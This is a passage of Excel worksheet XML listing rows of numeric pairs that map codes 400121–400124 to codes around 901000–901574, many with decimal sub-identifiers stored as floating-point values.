    <row r="475" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A475" s="6">
        <v>400121</v>
      </c>
      <c r="B475" s="3">
        <v>901546.005</v>
      </c>
    </row>
    <row r="476" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A476" s="6">
        <v>400121</v>
      </c>
      <c r="B476" s="3">
        <v>901546.00800000003</v>
      </c>
    </row>
    <row r="477" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A477" s="6">
        <v>400121</v>
      </c>
      <c r="B477" s="3">
        <v>901546.01300000004</v>
      </c>
    </row>
    <row r="478" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A478" s="6">
        <v>400121</v>
      </c>
      <c r="B478" s="3">
        <v>901546.01399999997</v>
      </c>
    </row>
    <row r="479" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A479" s="6">
        <v>400121</v>
      </c>
      <c r="B479" s="3">
        <v>901187</v>
      </c>
    </row>
    <row r="480" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A480" s="6">
        <v>400121</v>
      </c>
      <c r="B480" s="3">
        <v>901564</v>
      </c>
    </row>
    <row r="481" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A481" s="6">
        <v>400121</v>
      </c>
      <c r="B481" s="3">
        <v>901564.00100000005</v>
      </c>
    </row>
    <row r="482" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A482" s="6">
        <v>400121</v>
      </c>
      <c r="B482" s="3">
        <v>901564.00600000005</v>
      </c>
    </row>
    <row r="483" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A483" s="6">
        <v>400121</v>
      </c>
      <c r="B483" s="3">
        <v>901564.00899999996</v>
      </c>
    </row>
    <row r="484" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A484" s="6">
        <v>400121</v>
      </c>
      <c r="B484" s="3">
        <v>901574</v>
      </c>
    </row>
    <row r="485" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A485" s="6">
        <v>400121</v>
      </c>
      <c r="B485" s="3">
        <v>901574.00100000005</v>
      </c>
    </row>
    <row r="486" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A486" s="6">
        <v>400121</v>
      </c>
      <c r="B486" s="3">
        <v>901574.00199999998</v>
      </c>
    </row>
    <row r="487" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A487" s="6">
        <v>400121</v>
      </c>
      <c r="B487" s="3">
        <v>901574.00399999996</v>
      </c>
    </row>
    <row r="488" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A488" s="6">
        <v>400121</v>
      </c>
      <c r="B488" s="3">
        <v>901574.005</v>
      </c>
    </row>
    <row r="489" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A489" s="6">
        <v>400121</v>
      </c>
      <c r="B489" s="3">
        <v>901574.00600000005</v>
      </c>
    </row>
    <row r="490" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A490" s="6">
        <v>400121</v>
      </c>
      <c r="B490" s="3">
        <v>901574.00699999998</v>
      </c>
    </row>
    <row r="491" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A491" s="6">
        <v>400121</v>
      </c>
      <c r="B491" s="3">
        <v>901574.00800000003</v>
      </c>
    </row>
    <row r="492" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A492" s="6">
        <v>400121</v>
      </c>
      <c r="B492" s="3">
        <v>901574.00899999996</v>
      </c>
    </row>
    <row r="493" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A493" s="6">
        <v>400121</v>
      </c>
      <c r="B493" s="3">
        <v>901574.01</v>
      </c>
    </row>
    <row r="494" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A494" s="6">
        <v>400121</v>
      </c>
      <c r="B494" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="495" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A495" s="6">
        <v>400121</v>
      </c>
      <c r="B495" s="3">
        <v>901570</v>
      </c>
    </row>
    <row r="496" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A496" s="6">
        <v>400121</v>
      </c>
      <c r="B496" s="3">
        <v>901036.00699999998</v>
      </c>
    </row>
    <row r="497" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A497" s="6">
        <v>400121</v>
      </c>
      <c r="B497" s="3">
        <v>901556</v>
      </c>
    </row>
    <row r="498" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A498" s="6">
        <v>400121</v>
      </c>
      <c r="B498" s="3">
        <v>901556.00199999998</v>
      </c>
    </row>
    <row r="499" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A499" s="6">
        <v>400121</v>
      </c>
      <c r="B499" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="500" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A500" s="6">
        <v>400121</v>
      </c>
      <c r="B500" s="3">
        <v>901027.00399999996</v>
      </c>
    </row>
    <row r="501" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A501" s="6">
        <v>400121</v>
      </c>
      <c r="B501" s="3">
        <v>901027.00600000005</v>
      </c>
    </row>
    <row r="502" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A502" s="6">
        <v>400121</v>
      </c>
      <c r="B502" s="3">
        <v>901137</v>
      </c>
    </row>
    <row r="503" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A503" s="6">
        <v>400121</v>
      </c>
      <c r="B503" s="3">
        <v>901137.00100000005</v>
      </c>
    </row>
    <row r="504" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A504" s="6">
        <v>400121</v>
      </c>
      <c r="B504" s="3">
        <v>901137.00199999998</v>
      </c>
    </row>
    <row r="505" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A505" s="6">
        <v>400121</v>
      </c>
      <c r="B505" s="3">
        <v>901137.00600000005</v>
      </c>
    </row>
    <row r="506" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A506" s="6">
        <v>400121</v>
      </c>
      <c r="B506" s="3">
        <v>901566</v>
      </c>
    </row>
    <row r="507" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A507" s="6">
        <v>400121</v>
      </c>
      <c r="B507" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="508" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A508" s="6">
        <v>400121</v>
      </c>
      <c r="B508" s="3">
        <v>901091</v>
      </c>
    </row>
    <row r="509" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A509" s="6">
        <v>400121</v>
      </c>
      <c r="B509" s="3">
        <v>901496</v>
      </c>
    </row>
    <row r="510" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A510" s="6">
        <v>400121</v>
      </c>
      <c r="B510" s="3">
        <v>901053</v>
      </c>
    </row>
    <row r="511" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A511" s="6">
        <v>400121</v>
      </c>
      <c r="B511" s="3">
        <v>901053.00699999998</v>
      </c>
    </row>
    <row r="512" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A512" s="6">
        <v>400121</v>
      </c>
      <c r="B512" s="3">
        <v>901505</v>
      </c>
    </row>
    <row r="513" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A513" s="6">
        <v>400121</v>
      </c>
      <c r="B513" s="3">
        <v>901505.00199999998</v>
      </c>
    </row>
    <row r="514" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A514" s="6">
        <v>400121</v>
      </c>
      <c r="B514" s="3">
        <v>901505.00300000003</v>
      </c>
    </row>
    <row r="515" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A515" s="6">
        <v>400121</v>
      </c>
      <c r="B515" s="3">
        <v>901505.00399999996</v>
      </c>
    </row>
    <row r="516" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A516" s="6">
        <v>400121</v>
      </c>
      <c r="B516" s="3">
        <v>901218</v>
      </c>
    </row>
    <row r="517" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A517" s="6">
        <v>400121</v>
      </c>
      <c r="B517" s="3">
        <v>901218.00100000005</v>
      </c>
    </row>
    <row r="518" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A518" s="6">
        <v>400121</v>
      </c>
      <c r="B518" s="3">
        <v>901218.00199999998</v>
      </c>
    </row>
    <row r="519" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A519" s="6">
        <v>400121</v>
      </c>
      <c r="B519" s="3">
        <v>901218.005</v>
      </c>
    </row>
    <row r="520" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A520" s="6">
        <v>400121</v>
      </c>
      <c r="B520" s="3">
        <v>901218.01399999997</v>
      </c>
    </row>
    <row r="521" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A521" s="6">
        <v>400121</v>
      </c>
      <c r="B521" s="3">
        <v>901553.005</v>
      </c>
    </row>
    <row r="522" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A522" s="6">
        <v>400121</v>
      </c>
      <c r="B522" s="3">
        <v>901080</v>
      </c>
    </row>
    <row r="523" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A523" s="6">
        <v>400121</v>
      </c>
      <c r="B523" s="3">
        <v>901204</v>
      </c>
    </row>
    <row r="524" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A524" s="6">
        <v>400121</v>
      </c>
      <c r="B524" s="3">
        <v>901204.00100000005</v>
      </c>
    </row>
    <row r="525" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A525" s="6">
        <v>400121</v>
      </c>
      <c r="B525" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="526" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A526" s="6">
        <v>400122</v>
      </c>
      <c r="B526" s="3">
        <v>901554</v>
      </c>
    </row>
    <row r="527" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A527" s="6">
        <v>400122</v>
      </c>
      <c r="B527" s="3">
        <v>901485</v>
      </c>
    </row>
    <row r="528" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A528" s="6">
        <v>400122</v>
      </c>
      <c r="B528" s="3">
        <v>901565</v>
      </c>
    </row>
    <row r="529" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A529" s="6">
        <v>400122</v>
      </c>
      <c r="B529" s="3">
        <v>901565.00100000005</v>
      </c>
    </row>
    <row r="530" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A530" s="6">
        <v>400122</v>
      </c>
      <c r="B530" s="3">
        <v>901565.00300000003</v>
      </c>
    </row>
    <row r="531" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A531" s="6">
        <v>400122</v>
      </c>
      <c r="B531" s="3">
        <v>901070</v>
      </c>
    </row>
    <row r="532" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A532" s="6">
        <v>400122</v>
      </c>
      <c r="B532" s="3">
        <v>901070.00199999998</v>
      </c>
    </row>
    <row r="533" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A533" s="6">
        <v>400122</v>
      </c>
      <c r="B533" s="3">
        <v>901070.00300000003</v>
      </c>
    </row>
    <row r="534" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A534" s="6">
        <v>400122</v>
      </c>
      <c r="B534" s="3">
        <v>901070.00399999996</v>
      </c>
    </row>
    <row r="535" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A535" s="6">
        <v>400122</v>
      </c>
      <c r="B535" s="3">
        <v>901490</v>
      </c>
    </row>
    <row r="536" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A536" s="6">
        <v>400123</v>
      </c>
      <c r="B536" s="3">
        <v>901548</v>
      </c>
    </row>
    <row r="537" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A537" s="6">
        <v>400123</v>
      </c>
      <c r="B537" s="3">
        <v>901548.00100000005</v>
      </c>
    </row>
    <row r="538" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A538" s="6">
        <v>400123</v>
      </c>
      <c r="B538" s="3">
        <v>901554</v>
      </c>
    </row>
    <row r="539" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A539" s="6">
        <v>400123</v>
      </c>
      <c r="B539" s="3">
        <v>901565</v>
      </c>
    </row>
    <row r="540" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A540" s="6">
        <v>400123</v>
      </c>
      <c r="B540" s="3">
        <v>901565.00300000003</v>
      </c>
    </row>
    <row r="541" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A541" s="6">
        <v>400123</v>
      </c>
      <c r="B541" s="3">
        <v>901546</v>
      </c>
    </row>
    <row r="542" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A542" s="6">
        <v>400123</v>
      </c>
      <c r="B542" s="3">
        <v>901546.00600000005</v>
      </c>
    </row>
    <row r="543" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A543" s="6">
        <v>400123</v>
      </c>
      <c r="B543" s="3">
        <v>901222</v>
      </c>
    </row>
    <row r="544" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A544" s="6">
        <v>400123</v>
      </c>
      <c r="B544" s="3">
        <v>901222.00100000005</v>
      </c>
    </row>
    <row r="545" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A545" s="6">
        <v>400123</v>
      </c>
      <c r="B545" s="3">
        <v>901222.00199999998</v>
      </c>
    </row>
    <row r="546" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A546" s="6">
        <v>400123</v>
      </c>
      <c r="B546" s="3">
        <v>901564</v>
      </c>
    </row>
    <row r="547" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A547" s="6">
        <v>400123</v>
      </c>
      <c r="B547" s="3">
        <v>901564.00100000005</v>
      </c>
    </row>
    <row r="548" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A548" s="6">
        <v>400123</v>
      </c>
      <c r="B548" s="3">
        <v>901564.00399999996</v>
      </c>
    </row>
    <row r="549" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A549" s="6">
        <v>400123</v>
      </c>
      <c r="B549" s="3">
        <v>901564.00699999998</v>
      </c>
    </row>
    <row r="550" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A550" s="6">
        <v>400123</v>
      </c>
      <c r="B550" s="3">
        <v>901564.00899999996</v>
      </c>
    </row>
    <row r="551" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A551" s="6">
        <v>400123</v>
      </c>
      <c r="B551" s="3">
        <v>901070</v>
      </c>
    </row>
    <row r="552" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A552" s="6">
        <v>400123</v>
      </c>
      <c r="B552" s="3">
        <v>901070.00600000005</v>
      </c>
    </row>
    <row r="553" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A553" s="6">
        <v>400123</v>
      </c>
      <c r="B553" s="3">
        <v>901570</v>
      </c>
    </row>
    <row r="554" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A554" s="6">
        <v>400123</v>
      </c>
      <c r="B554" s="3">
        <v>901036</v>
      </c>
    </row>
    <row r="555" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A555" s="6">
        <v>400123</v>
      </c>
      <c r="B555" s="3">
        <v>901036.00100000005</v>
      </c>
    </row>
    <row r="556" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A556" s="6">
        <v>400123</v>
      </c>
      <c r="B556" s="3">
        <v>901036.00199999998</v>
      </c>
    </row>
    <row r="557" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A557" s="6">
        <v>400123</v>
      </c>
      <c r="B557" s="3">
        <v>901036.00300000003</v>
      </c>
    </row>
    <row r="558" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A558" s="6">
        <v>400123</v>
      </c>
      <c r="B558" s="3">
        <v>901036.005</v>
      </c>
    </row>
    <row r="559" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A559" s="6">
        <v>400123</v>
      </c>
      <c r="B559" s="3">
        <v>901036.00600000005</v>
      </c>
    </row>
    <row r="560" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A560" s="6">
        <v>400123</v>
      </c>
      <c r="B560" s="3">
        <v>901036.00699999998</v>
      </c>
    </row>
    <row r="561" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A561" s="6">
        <v>400123</v>
      </c>
      <c r="B561" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="562" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A562" s="6">
        <v>400123</v>
      </c>
      <c r="B562" s="3">
        <v>901027.00100000005</v>
      </c>
    </row>
    <row r="563" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A563" s="6">
        <v>400123</v>
      </c>
      <c r="B563" s="3">
        <v>901027.00199999998</v>
      </c>
    </row>
    <row r="564" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A564" s="6">
        <v>400123</v>
      </c>
      <c r="B564" s="3">
        <v>901027.00300000003</v>
      </c>
    </row>
    <row r="565" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A565" s="6">
        <v>400123</v>
      </c>
      <c r="B565" s="3">
        <v>901027.00399999996</v>
      </c>
    </row>
    <row r="566" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A566" s="6">
        <v>400123</v>
      </c>
      <c r="B566" s="3">
        <v>901055</v>
      </c>
    </row>
    <row r="567" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A567" s="6">
        <v>400123</v>
      </c>
      <c r="B567" s="3">
        <v>901055.01300000004</v>
      </c>
    </row>
    <row r="568" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A568" s="6">
        <v>400123</v>
      </c>
      <c r="B568" s="3">
        <v>901218.01100000006</v>
      </c>
    </row>
    <row r="569" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A569" s="6">
        <v>400123</v>
      </c>
      <c r="B569" s="3">
        <v>901553</v>
      </c>
    </row>
    <row r="570" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A570" s="6">
        <v>400123</v>
      </c>
      <c r="B570" s="3">
        <v>901553.00100000005</v>
      </c>
    </row>
    <row r="571" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A571" s="6">
        <v>400123</v>
      </c>
      <c r="B571" s="3">
        <v>901553.00199999998</v>
      </c>
    </row>
    <row r="572" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A572" s="6">
        <v>400123</v>
      </c>
      <c r="B572" s="3">
        <v>901553.005</v>
      </c>
    </row>
    <row r="573" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A573" s="6">
        <v>400124</v>
      </c>
      <c r="B573" s="3">
        <v>901548</v>
      </c>
    </row>
    <row r="574" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A574" s="6">
        <v>400124</v>
      </c>
      <c r="B574" s="3">
        <v>901548.00100000005</v>
      </c>
    </row>
    <row r="575" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A575" s="6">
        <v>400124</v>
      </c>
      <c r="B575" s="3">
        <v>901548.00300000003</v>
      </c>
    </row>
    <row r="576" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A576" s="6">
        <v>400124</v>
      </c>
      <c r="B576" s="3">
        <v>901098</v>
      </c>
    </row>
    <row r="577" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A577" s="6">
        <v>400124</v>
      </c>
      <c r="B577" s="3">
        <v>901098.00399999996</v>
      </c>
    </row>
    <row r="578" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A578" s="6">
        <v>400124</v>
      </c>
      <c r="B578" s="3">
        <v>901547</v>
      </c>
    </row>
    <row r="579" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A579" s="6">
        <v>400124</v>
      </c>
      <c r="B579" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="580" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A580" s="6">
        <v>400124</v>
      </c>
      <c r="B580" s="3">
        <v>901547.00600000005</v>
      </c>
    </row>
    <row r="581" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A581" s="6">
        <v>400124</v>
      </c>
      <c r="B581" s="3">
        <v>901547.00699999998</v>
      </c>
    </row>
    <row r="582" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A582" s="6">
        <v>400124</v>
      </c>
      <c r="B582" s="3">
        <v>901547.00800000003</v>
      </c>
    </row>
    <row r="583" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A583" s="6">
        <v>400124</v>
      </c>
      <c r="B583" s="3">
        <v>901547.00899999996</v>
      </c>
    </row>
    <row r="584" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A584" s="6">
        <v>400124</v>
      </c>
      <c r="B584" s="3">
        <v>901547.01100000006</v>
      </c>
    </row>
    <row r="585" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A585" s="6">
        <v>400124</v>
      </c>
      <c r="B585" s="3">
        <v>901547.01300000004</v>
      </c>
    </row>
    <row r="586" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A586" s="6">
        <v>400124</v>
      </c>
      <c r="B586" s="3">
        <v>901547.01500000001</v>
      </c>
    </row>
    <row r="587" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A587" s="6">
        <v>400124</v>
      </c>
      <c r="B587" s="3">
        <v>901037</v>
      </c>
    </row>
    <row r="588" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A588" s="6">
        <v>400124</v>
      </c>
      <c r="B588" s="3">
        <v>901037.00199999998</v>
      </c>
    </row>
    <row r="589" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A589" s="6">
        <v>400124</v>
      </c>
      <c r="B589" s="3">
        <v>901037.00300000003</v>
      </c>
    </row>
    <row r="590" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A590" s="6">
        <v>400124</v>
      </c>
      <c r="B590" s="3">
        <v>901037.00399999996</v>
      </c>
    </row>
    <row r="591" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A591" s="6">
        <v>400124</v>
      </c>
      <c r="B591" s="3">
        <v>901037.005</v>
      </c>
    </row>
    <row r="592" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A592" s="6">
        <v>400124</v>
      </c>
      <c r="B592" s="3">
        <v>901554</v>
      </c>
    </row>
    <row r="593" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A593" s="6">
        <v>400124</v>
      </c>
      <c r="B593" s="3">
        <v>901543</v>
      </c>
    </row>
    <row r="594" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A594" s="6">
        <v>400124</v>
      </c>
      <c r="B594" s="3">
        <v>901543.00100000005</v>
      </c>
    </row>
    <row r="595" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A595" s="6">
        <v>400124</v>
      </c>
      <c r="B595" s="3">
        <v>901543.00199999998</v>
      </c>
    </row>
    <row r="596" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A596" s="6">
        <v>400124</v>
      </c>
      <c r="B596" s="3">
        <v>901543.00399999996</v>
      </c>
    </row>
    <row r="597" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A597" s="6">
        <v>400124</v>
      </c>
      <c r="B597" s="3">
        <v>901485</v>
      </c>
    </row>
    <row r="598" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A598" s="6">
        <v>400124</v>
      </c>
      <c r="B598" s="3">
        <v>901486</v>
      </c>
    </row>
    <row r="599" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A599" s="6">
        <v>400124</v>
      </c>
      <c r="B599" s="3">
        <v>901565</v>
      </c>
    </row>
    <row r="600" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A600" s="6">
        <v>400124</v>
      </c>
      <c r="B600" s="3">
        <v>901565.00100000005</v>
      </c>
    </row>
    <row r="601" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A601" s="6">
        <v>400124</v>
      </c>
      <c r="B601" s="3">
        <v>901565.00300000003</v>
      </c>
    </row>
    <row r="602" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A602" s="6">
        <v>400124</v>
      </c>
      <c r="B602" s="3">
        <v>901491</v>
      </c>
    </row>
    <row r="603" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A603" s="6">
        <v>400124</v>
      </c>
      <c r="B603" s="3">
        <v>901491.00100000005</v>
      </c>
    </row>
    <row r="604" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A604" s="6">
        <v>400124</v>
      </c>
      <c r="B604" s="3">
        <v>901491.00199999998</v>
      </c>
    </row>
    <row r="605" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A605" s="6">
        <v>400124</v>
      </c>
      <c r="B605" s="3">
        <v>901140</v>
      </c>
    </row>
    <row r="606" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A606" s="6">
        <v>400124</v>
      </c>
      <c r="B606" s="3">
        <v>901546</v>
      </c>
    </row>
    <row r="607" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A607" s="6">
        <v>400124</v>
      </c>
      <c r="B607" s="3">
        <v>901546.00199999998</v>
      </c>
    </row>
    <row r="608" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A608" s="6">
        <v>400124</v>
      </c>
      <c r="B608" s="3">
        <v>901546.00399999996</v>
      </c>
    </row>
    <row r="609" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A609" s="6">
        <v>400124</v>
      </c>
      <c r="B609" s="3">
        <v>901546.005</v>
      </c>
    </row>
    <row r="610" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A610" s="6">
        <v>400124</v>
      </c>
      <c r="B610" s="3">
        <v>901546.00600000005</v>
      </c>
    </row>
    <row r="611" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A611" s="6">
        <v>400124</v>
      </c>
      <c r="B611" s="3">
        <v>901546.00800000003</v>
      </c>
    </row>
    <row r="612" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A612" s="6">
        <v>400124</v>
      </c>
      <c r="B612" s="3">
        <v>901546.01100000006</v>
      </c>
    </row>
    <row r="613" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A613" s="6">
        <v>400124</v>
      </c>
      <c r="B613" s="3">
        <v>901546.01300000004</v>
      </c>
    </row>
    <row r="614" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A614" s="6">
        <v>400124</v>
      </c>
      <c r="B614" s="3">
        <v>901546.01399999997</v>
      </c>
    </row>
    <row r="615" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A615" s="6">
        <v>400124</v>
      </c>
      <c r="B615" s="3">
        <v>901187</v>
      </c>
    </row>
    <row r="616" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A616" s="6">
        <v>400124</v>
      </c>
      <c r="B616" s="3">
        <v>901564</v>
      </c>
    </row>
    <row r="617" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A617" s="6">
        <v>400124</v>
      </c>
      <c r="B617" s="3">
        <v>901564.00199999998</v>
      </c>
    </row>
    <row r="618" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A618" s="6">
        <v>400124</v>
      </c>
      <c r="B618" s="3">
        <v>901564.00300000003</v>
      </c>
    </row>
    <row r="619" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A619" s="6">
        <v>400124</v>
      </c>
      <c r="B619" s="3">
        <v>901564.00399999996</v>
      </c>
    </row>
    <row r="620" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A620" s="6">
        <v>400124</v>
      </c>
      <c r="B620" s="3">
        <v>901564.005</v>
      </c>
    </row>
    <row r="621" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A621" s="6">
        <v>400124</v>
      </c>
      <c r="B621" s="3">
        <v>901564.00800000003</v>
      </c>
    </row>
    <row r="622" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A622" s="6">
        <v>400124</v>
      </c>
      <c r="B622" s="3">
        <v>901574</v>
      </c>
    </row>
    <row r="623" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A623" s="6">
        <v>400124</v>
      </c>
      <c r="B623" s="3">
        <v>901574.00100000005</v>
      </c>
    </row>
    <row r="624" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A624" s="6">
        <v>400124</v>
      </c>
      <c r="B624" s="3">
        <v>901574.00199999998</v>
      </c>
    </row>
    <row r="625" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A625" s="6">
        <v>400124</v>
      </c>
      <c r="B625" s="3">
        <v>901574.00399999996</v>
      </c>
    </row>
    <row r="626" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A626" s="6">
        <v>400124</v>
      </c>
      <c r="B626" s="3">
        <v>901574.005</v>
      </c>
    </row>
    <row r="627" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A627" s="6">
        <v>400124</v>
      </c>
      <c r="B627" s="3">
        <v>901574.00600000005</v>
      </c>
    </row>
    <row r="628" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A628" s="6">
        <v>400124</v>
      </c>
      <c r="B628" s="3">
        <v>901574.00699999998</v>
      </c>
    </row>
    <row r="629" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A629" s="6">
        <v>400124</v>
      </c>
      <c r="B629" s="3">
        <v>901574.00800000003</v>
      </c>
    </row>
    <row r="630" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A630" s="6">
        <v>400124</v>
      </c>
      <c r="B630" s="3">
        <v>901574.00899999996</v>
      </c>
    </row>
    <row r="631" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A631" s="6">
        <v>400124</v>
      </c>
      <c r="B631" s="3">
        <v>901574.01</v>
      </c>
    </row>
    <row r="632" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A632" s="6">
        <v>400124</v>
      </c>
      <c r="B632" s="3">
        <v>901070</v>
      </c>
    </row>
    <row r="633" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A633" s="6">
        <v>400124</v>
      </c>
      <c r="B633" s="3">
        <v>901070.00199999998</v>
      </c>
    </row>
